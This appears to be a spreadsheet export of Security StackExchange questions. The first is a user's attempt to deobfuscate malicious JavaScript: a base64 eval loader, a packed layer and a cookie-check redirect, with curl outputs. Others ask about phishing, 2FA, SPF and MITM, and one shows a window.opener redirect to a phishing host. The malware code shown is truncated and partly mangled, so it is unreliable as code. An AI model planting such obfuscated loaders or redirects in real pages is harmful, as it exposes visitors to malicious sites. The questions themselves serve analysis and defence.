 var lOO = '==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';
  function OII(data) {
  var _1O0lOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
  enc = '';
  do {
  h1 = _1O0lOI.indexOf(data.charAt(i++));
  h2 = _1O0lOI.indexOf(data.charAt(i++));
  h3 = _1O0lOI.indexOf(data.charAt(i++));
  h4 = _1O0lOI.indexOf(data.charAt(i++));
  bits = h1 &gt; 16 &amp; 0xff;
  o2 = bits &gt;&gt; 8 &amp; 0xff;
  o3 = bits &amp; 0xff;
  if (h3 == 64) {
  enc += String.fromCharCode(o1)
  } else if (h4 == 64) {
  enc += String.fromCharCode(o1, o2)
  } else {
  enc += String.fromCharCode(o1, o2, o3)
  }
  } while (i = 0; i--) {
  ret += string.charAt(i);
  }
  return ret;
  }
  eval(OII(_1O0(lOO)));
 &lt;/pre&gt;
 &lt;p&gt;Seeing that this is a Base64 Decode I ran it in a compiler, instead of using eval() i used console.log() to print out the results.&lt;/p&gt;
 &lt;pre&gt;
 eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2i(26(p,a,c,k,e,d){e=26(c){25(c35?2a.2e(c+29):c.2d(36))};2b(!\'\'.27(/^/,2a)){28(c--){d[e(c)]=k[c]||e(c)}k=[26(e){25 d[e]}];e=26(){25\'\\\\w+\'};c=1};28(c--){2b(k[c]){p=p.27(2c 2f(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}25 p}(\'1p(U(p,a,c,k,e,d){e=U(c){W(c1s?1r.1m(c+1g):c.1f(1e))};1h(c--){1i(k[c]){p=p.1k(1j 1o(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}W p}(\\\'M I=\\\\\\\'%H%b%8%a%3%o%4%2%4%C%o%0%h%j%4%0%G%4%g%L%5%s%5%b%8%a%3%o%4%j%J%9%e%n%6%8%4%3%1%6%2%5%a%0%x%8%1%1%d%3%0%b%x%0%6%5%k%7%0%c%l%m%9%z%9%i%s%5%a%2%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%2%l%6%5%s%3%B%5%4%1%a%f%8%1%1%d%3%0%r%6%5%k%7%0%c%m%2%E%2%4%a%n%0%2%w%2%e%5%7%b%0%v%9%9%i%3%e%2%l%4%C%o%0%1%e%2%6%5%s%3%B%5%4%1%a%f%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%h%2%j%n%6%c%0%e%3%6%0%c%j%2%D%D%2%F%8%1%1%d%3%0%r%6%5%k%7%0%c%m%9%i%z%2%9%i%i%c%1%8%n%t%0%6%4%f%8%1%1%d%3%0%h%j%4%0%b%4%8%1%1%d%3%0%j%v%9%i%i%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%2%l%c%1%8%n%t%0%6%4%f%8%1%1%d%3%0%f%3%6%c%0%G%N%e%l%j%4%0%b%4%8%1%1%d%3%0%j%m%2%F%h%2%p%S%m%2%E%2%4%a%n%0%2%w%2%e%5%7%b%0%v%9%i%A%9%i%a%0%4%n%a%6%2%l%8%1%1%d%3%0%r%6%5%k%7%0%c%m%v%9%A%9%3%e%2%l%5%a%0%x%8%1%1%d%3%0%b%x%0%6%5%k%7%0%c%l%m%m%2%z%9%2%2%2%2%q%3%6%c%1%q%f%7%1%8%5%4%3%1%6%f%u%a%0%e%2%h%2%y%u%4%4%o%w%g%g%R%O%K%p%q%0%3%B%u%4%7%1%b%b%f%4%1%o%7%1%s%0%7%C%e%1%a%t%1%4%3%1%6%f%8%1%t%g%n%b%g%5%7%t%d%g%8%7%5%p%b%5%e%e%7%1%q%0%a%p%1%3%7%g%y%v%9%A%2%0%7%b%0%2%z%9%2%2%2%2%q%3%6%c%1%q%f%7%1%8%5%4%3%1%6%f%u%a%0%e%2%h%2%y%u%4%4%o%w%g%g%b%5%s%0%p%4%u%0%p%q%3%7%c%p%5%6%3%t%5%7%b%f%6%0%4%g%y%v%9%A%9%H%g%b%8%a%3%o%4%J\\\\\\\';[removed for protection]|2Z|2M|2N|2O|2L|2K|2H|2I|2J|2P|2Q|2W|2X|30|2Y|2V|2U|2R|2S\'.2h(\'|\'),0,{}))',62,204,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|replace|while||String|if|new|toString|fromCharCode|RegExp|parseInt|split|eval|u0065|u0020|u006f|u006b|u0022|u0072|u002e|u0063|u0061|u0069|u006e|56|62|129|u0074|u000a|_escape|u0066|u0009|u003d|u0073|u002f|u0064|u006c|u0029|u0067|u0028|u0075|u0045|u0034|u0070|u0077|u0076|u002d|u0068|u003b|u003e|u006d|u007b|u005f|u0027|u003a|u0079|u007d|u003f|u0021|u006a|u0078|||u003c|u0062|u0039|var|u0026|write|u0036|document|unescape|u0031|u004f'.split('|')))
 &lt;/pre&gt;
 &lt;p&gt;I ran that in &lt;a href="http://jsbeautifier.org" rel="nofollow"&gt;http://jsbeautifier.org&lt;/a&gt; and got there results returned&lt;/p&gt;
 &lt;pre&gt;
 var _escape = '%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u0020%u0074%u0079%u0070%u0065%u003d%u0022%u0074%u0065%u0078%u0074%u002f%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u0022%u003e%u000a%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u0061%u0072%u0065%u005f%u0063%u006f%u006f%u006b%u0069%u0065%u0073%u005f%u0065%u006e%u0061%u0062%u006c%u0065%u0064%u0028%u0029%u000a%u007b%u000a%u0009%u0076%u0061%u0072%u0020%u0063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0062%u006c%u0065%u0064%u0020%u003d%u0020%u0028%u006e%u0061%u0076%u0069%u0067%u0061%u0074%u006f%u0072%u002e%u0063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0062%[removed for protection];
 document.write(unescape(_escape));
 &lt;/pre&gt;
 &lt;p&gt;After that I took the code replaced &lt;em&gt;document.write&lt;/em&gt; with &lt;em&gt;console.log&lt;/em&gt; and came back with the following javascript.&lt;/p&gt;
 &lt;pre&gt;
  function are_cookies_enabled() {
  var cookieEnabled = (navigator.cookieEnabled) ? true : false;
  if (typeof navigator.cookieEnabled == "undefined" &amp;&amp; !cookieEnabled) {
  document.cookie = "testcookie";
  cookieEnabled = (document.cookie.indexOf("testcookie") != -1) ? true : false;
  }
  return (cookieEnabled);
  }
  if (are_cookies_enabled()) {
  window.location.href = 'website';
  } else {
  window.location.href = 'certain website';
  }
 &lt;/pre&gt;
 &lt;p&gt;Seeing these two websites I used cURL on the first link and got returned this header &lt;/p&gt;
 &lt;pre&gt;
 HTTP/1.1 301 Moved Permanently
 Server: nginx/1.8.1
 Date: Sat, 21 May 2016 21:42:15 GMT
 Content-Type: text/html
 Content-Length: 33
 Connection: keep-alive
 X-Powered-By: ARR/2.5(441192e35)
 Location: (link to second website in javascript)
 &lt;/pre&gt;
 &lt;p&gt;The body of this link contained a redirect to the second link. Running cURL on that I got this header response &lt;/p&gt;
 &lt;pre&gt;
 HTTP/1.1 302 Found
 Server: nginx/1.9.9
 Date: Sat, 21 May 2016 21:42:38 GMT
 Content-Length: 11
 Connection: keep-alive
 location: (link to header response from first link)
 &lt;/pre&gt;
 &lt;p&gt;The body contained was a "redirecting". Apparently pointing back to the second link with the header cookies as seen above, setting the cookie to a domain path.&lt;/p&gt;
 &lt;p&gt;So my question is, have I de-obfuscated the code correctly? Is this malware trying to create a test cookie and redirect to another malicious website?&lt;/p&gt;
 &lt;p&gt;I just really want to understand why not just run the javascript right there instead of redirecting all over the place? And what is the purpose of setting the cookie to the domain? Is it a backdoor, botnet, ddos?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;javascript&gt;&lt;cookies&gt;&lt;phishing&gt;&lt;reverse-engineering&gt;</t>
  </si>
  <si>
    <t>What is the real risk of clicking a link?</t>
  </si>
  <si>
    <t>&lt;p&gt;If I were to click a link on any of my devices, be it over text message, email, or from a webpage, and enter no information/actions with the target page. What is the worst that could happen?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;http&gt;&lt;exploit&gt;&lt;phishing&gt;&lt;ipsec&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Can a hacker compromise the system if he can steal one of the factors of the 2FA?</t>
  </si>
  <si>
    <t>&lt;p&gt;I read &lt;a href="https://www.csoonline.com/article/3272425/authentication/11-ways-to-hack-2fa.html" rel="nofollow noreferrer"&gt;this article&lt;/a&gt; saying that smartcards used as a 2FA are still susceptible to attacks such as MITM attack:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;They think 2FA is unhackable...undefeatable, when that clearly isn‚Äôt true. They think 2FA will stop advanced persistent threats (APTs), defeat phishing and social engineering, and stop all sorts of threats that it was never designed to do.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Does it mean it is not safe to use smartcards in terms of 2FA? Also for example I have a device or website that I want to log in using a password with 2FA. Is there any chance that a hacker can still compromise the system if he can get the password or the smartcard?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;cryptography&gt;&lt;multi-factor&gt;&lt;smartcard&gt;</t>
  </si>
  <si>
    <t>Does Google flag all subdomains for malware/phishing if one is infected?</t>
  </si>
  <si>
    <t>&lt;p&gt;After I tried logging to my host's cpanel today, I got the safe browsing warning, about the site "redirecting users to harmful websites".&lt;/p&gt;
 &lt;p&gt;The cpanel uses an address like this:
 &lt;a href="https://subdomainXX.host.com:8443/" rel="nofollow noreferrer"&gt;https://subdomainXX.host.com:8443/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Each subdomainXX is a different VPS providing by the host company.&lt;/p&gt;
 &lt;p&gt;The address subdomainXX.host.com isn't used for anything else other than the cpanel access (afaik). Indeed, searching for it in Google using the site: operator returns 0 results.&lt;/p&gt;
 &lt;p&gt;However, searching for site:host.com, returns several infected sites. The other sites are located at different IPs (and I presume different VPS)&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/a/110781/184817"&gt;This answer&lt;/a&gt; seems to suggest that it has happened before, but it's just a guess, with no authoritative documentation.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;My question:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Does Google flag all subdomains for malware/phishing if one is infected? (source/documentation if possible) If yes, how can a host be protected from such (mis)use?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google&gt;&lt;safe-browsing-filter&gt;</t>
  </si>
  <si>
    <t>How wifi network MITM works?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have seen a lot of tutorials showing how to MITM a network using various tools. But it usually says that we require a network adapter with monitor mode options.&lt;/p&gt;
 &lt;p&gt;I own my wifi router and can connect to it using a wired medium too. Can I do a MITM attack over that wifi i.e. MITM the wifi devices without using any network adapter?&lt;/p&gt;
 &lt;p&gt;For eg. can I tell my wifi router to redirect to a certain phishing page whenever someone connected to my wifi goes to &lt;code&gt;www.example.com&lt;/code&gt;?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wifi&gt;&lt;man-in-the-middle&gt;</t>
  </si>
  <si>
    <t>Does this pdf file embeds an exploit or malware?</t>
  </si>
  <si>
    <t>&lt;p&gt;So a friend of mine was sent a phishing attack(Which was tailored for him and he fell for it) which also downloaded this pdf file: &lt;code&gt;hxxps://www.dropbox.com/s/qw9mcw9p3pmc5j5/resume.pdf?dl=0&lt;/code&gt; and he opened it. The file is unreadable. Looks like it doesn't have the right font, or needs a different encoding to be read. I was wondering if the pdf file contains any malware or exploit(somehow using adobe reader or google chrome pdf reader to gain access to the system).&lt;/p&gt;
 &lt;p&gt;I &lt;a href="https://www.virustotal.com/en/file/a52d0d4091323192fb46db1007541e509fe51e6b7df85c15153278e7aa4e94de/analysis/" rel="nofollow"&gt;uploaded it to virus total&lt;/a&gt; and &lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=acb6b440efca663d5a23172107e68e91&amp;amp;type=js" rel="nofollow"&gt;wepawet&lt;/a&gt; nothing was detected.&lt;/p&gt;
 &lt;p&gt;Is it possible that this PDF could contain any malware or exploit? Maybe you can have a look at it?&lt;/p&gt;
 &lt;p&gt;Because if it doesn't have anything, then what's the point of it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;exploit&gt;&lt;pdf&gt;&lt;incident-analysis&gt;</t>
  </si>
  <si>
    <t>Free SSL Certificate when encryption is needed and not trust?</t>
  </si>
  <si>
    <t>&lt;p&gt;My understanding is that SSL certificates are expensive because you are paying a 3rd party to vouch for your identity, and apparently the most secure form of trust is the trust you have to pay for. I'm guessing the trust you're getting is a way to show you're not a phishing website or something (even though I've seen very convincing SSL certificates on phishing websites).&lt;/p&gt;
 &lt;p&gt;Anyway, I have an API which just needs encrypted communication between a client and web server. I don't need the trust factor that $200-per-year certificates offer, because users aren't even using a web browser to use my API - they're using some code they've written themselves and the URL is hard-coded into their applications.&lt;/p&gt;
 &lt;p&gt;Unfortunately working with SSL certificates is tricky for most new developers (whom will be using my API) if the certificate is self-signed. Most programming frameworks will throw an exception if the untrusted certificate isn't imported, etc. It's too annoying and will drive developers away from my service. However, not encrypting traffic is just not an option.&lt;/p&gt;
 &lt;p&gt;All I need is for web traffic to be encrypted and for developers who use my API to not have to jump through hoops. The mechanism for doing encryption is free and open source, and I don't want to have to buy added 3-rd party "trust". &lt;/p&gt;
 &lt;p&gt;TLDR / Conclusion: &lt;strong&gt;Is there any way to generate a free SSL certificate that will be trusted by most programming frameworks? OR, are there any other options for secure communication over HTTP without a purchased SSL certificate?&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;http&gt;</t>
  </si>
  <si>
    <t>How does SPF makes life any harder for a spammer/phisher?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am studying a little bit SPF and other spam/phishing prevention techniques that have been developed during the years, and I have a few question about SPF. I know the difference between the &lt;strong&gt;MAIL FROM&lt;/strong&gt; verb and the &lt;strong&gt;FROM&lt;/strong&gt; header, but I am having problems into understanding if and how SPF makes harder for a spammer/phisher to achieve it's goal.&lt;/p&gt;
 &lt;p&gt;What I do understand is that while it is usually desirable, for a spammer/phisher, to abuse the &lt;strong&gt;FROM&lt;/strong&gt; header so that the mail seems to be coming from a legit source (this is what the user sees, after all), the &lt;strong&gt;MAIL FROM&lt;/strong&gt; field is not shown to the user. For example, the phisher could register a real, valid domain to send mail from, and this would be bypassed. Another thing that comes to my mind is that, for example, mybank.com has a very simple SPF entry: &lt;code&gt;mybank.com. IN TXT "v=spf1 a -all"&lt;/code&gt;. In this case, a spammer could easily forge emails with the &lt;strong&gt;MAIL FROM&lt;/strong&gt; set to &lt;em&gt;secure.mybank.com&lt;/em&gt;, thus bypassing the SPF check as for &lt;em&gt;secure.mybank.com&lt;/em&gt; there is no SPF entry (and the default is a pass, if no SPF entry exists). Also, he could abuse a completely non-existing domain, not a subdomain of something that exists. &lt;/p&gt;
 &lt;p&gt;In the last cases, the only thing that the receiver server could do would be to cross-validate the &lt;strong&gt;MAIL FROM&lt;/strong&gt; verb and the &lt;strong&gt;FROM&lt;/strong&gt; header to ensure they are the same, but again, the &lt;strong&gt;FROM&lt;/strong&gt; header could be spoofed to &lt;em&gt;admin@secure.mybank.com&lt;/em&gt; (I know that for that there is DMARC, but I'm considering a case where SPF only is implemented).&lt;/p&gt;
 &lt;p&gt;Mainly, I don't understand if SPF was born with the goal to make life harder for spammer/phishers, or if it was born to make sysadmin's life easier (since an appropriate SPF configuration could reduce the number of error messages received by a domain that is being abused). Even if it is the latter, I don't understand the main benefit for a spammer/phisher to use a legit &lt;strong&gt;MAIL FROM&lt;/strong&gt; address.&lt;/p&gt;
 &lt;p&gt;Thanks in advance to anyone.&lt;/p&gt;
 &lt;p&gt;EDIT: I see that this question was marked as duplicate, and I may have missed a point, but I think that the other questions don't answer my main point, that is, what is the point of having SPF alone? Along with DMARC and DKIM it can be used to detect phishing attempts, but SPF alone can be easily bypassed by using a subdomain of an existing domain or a new domain. In my understanding, SPF can help in reducing UBE for sysadmins, but not a single user from spam/phish, and was looking for a confirmation or refutation for this.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;phishing&gt;&lt;spf&gt;</t>
  </si>
  <si>
    <t>How can I find the external IP address of a secure network I can't access?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there even a way to do this? I thought you had to be on the network to get information about it. Ideally I don't want to use any sort of phishing/social-engineering attack.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ip&gt;&lt;network-scanners&gt;&lt;ipsec&gt;&lt;network-access-control&gt;</t>
  </si>
  <si>
    <t>Security about window.opener and iframes</t>
  </si>
  <si>
    <t>&lt;p&gt;I have 3 domains : &lt;code&gt;domainA domainB domainC&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;If I set &lt;code&gt;target="_blank"&lt;/code&gt; on &lt;code&gt;domainA&lt;/code&gt; with a link to &lt;code&gt;domainC&lt;/code&gt;, &lt;code&gt;domainC&lt;/code&gt; can access a bunch of property of &lt;code&gt;domainA&lt;/code&gt;. That's why I use &lt;code&gt;target="_blank" rel="noopener noreferrer"&lt;/code&gt;.
 Otherwise, things like easier phishing are possible. Consider the following code on &lt;code&gt;domainC&lt;/code&gt; :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;if(window.opener){
  window.opener.location="http://phishing.com"
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If &lt;code&gt;domainA&lt;/code&gt; contains a link like &lt;code&gt;&amp;lt;a href="https://domainC.com" target="_blank"&amp;gt;&lt;/code&gt;, the condition will trigger and redirect &lt;code&gt;domainA&lt;/code&gt; to attacker controlled domain. Otheres properties, like &lt;code&gt;window.opener.length&lt;/code&gt; are readable.&lt;/p&gt;
 &lt;p&gt;While it is not really a vulnerability in fact because defined by the W3C, it is unknown from most developpers.&lt;/p&gt;
 &lt;p&gt;Now, I want to include an iframe from &lt;code&gt;domainB&lt;/code&gt;in &lt;code&gt;domainA&lt;/code&gt;, which I trust, but which is not protected against &lt;code&gt;target="_blank"&lt;/code&gt; vulnerability.&lt;/p&gt;
 &lt;p&gt;I tested and clicked on a link on my iframe, and it looks like the &lt;code&gt;window.opener&lt;/code&gt; wasn't &lt;code&gt;null&lt;/code&gt; as it would be with &lt;code&gt;noopener noreferrer&lt;/code&gt;, but I havn't be able to access attribute nor methods of it. When doing so (eg : redirecting), it prints : &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Unsafe JavaScript attempt to initiate navigation for frame with URL &lt;code&gt;domainB&lt;/code&gt; from frame with URL &lt;code&gt;domainC&lt;/code&gt;. The frame attempting navigation is neither same-origin with the target, nor is it the target's parent or opener.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Then, can we consider it safe to include iframe without protection on &lt;code&gt;target="_blank"&lt;/code&gt;?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;same-origin-policy&gt;&lt;iframe&gt;&lt;crossdomain&gt;</t>
  </si>
  <si>
    <t>How secure is JavaScript based OAuth 2.0</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript based OAuth exposes the client ID of the application and it trusts only on the domain requesting the access token. The domain name can be forged with a DNS hijack (or a virus affecting &lt;code&gt;/etc/hosts&lt;/code&gt;). Then why is JavaScript based OAuth supported by Google, Facebook for clients not using HTTPS? Or am I missing something?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;oauth&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What is the endgame of a site like this?</t>
  </si>
  <si>
    <t>&lt;p&gt;I came across the following ad:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/ZK9y8.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/ZK9y8.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It's in Dutch, and the title seems to be a mix of autogenerated words to probably create as much of a clickbait title as possible.&lt;/p&gt;
 &lt;p&gt;The ad goes to the following page: &lt;code&gt;https://cotqt.com/rtl-late-night-wil-scoren-met-nepnieuws-over-knappe-man.php&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;It is clearly some fake page and the story also seems to be autogenerated with words that attract attention.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;There is no follow up advertisement&lt;/li&gt;
 &lt;li&gt;There are no clear links to other products &lt;/li&gt;
 &lt;li&gt;The shop is not even working &lt;/li&gt;
 &lt;li&gt;There is no submit button so it also doesn't &lt;em&gt;seem&lt;/em&gt; to try to capture passwords&lt;/li&gt;
 &lt;li&gt;I don't any weird XHR requests going off&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Someone is paying 10 cent - 50 cent per click for this. &lt;/p&gt;
 &lt;p&gt;Is this a phishing site? What can be the goal for this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Have i been phished?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently opened a link from a "friend", while I was on my workplace. It was some really simple stupid game "Super Mario" type. I opened it, played for 10 seconds and closed the link. What felt suspicious in first place was that the link that he provided me was sent with whitespace in it i.e. http:// some-url . something . com. When I came home I still wasn't aware what is happening and I opened the game again and my ESET NOD 32 said that the site you are visiting may attack you using phishing. A "friend" of mine said that it says that because he had that game on free web server. I would really use some opinion on this. What sensitive data could he possibly get? I'm part of more than 50 computers computer network system.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;webserver&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is this spam SMS containing an audio file dangerous?</t>
  </si>
  <si>
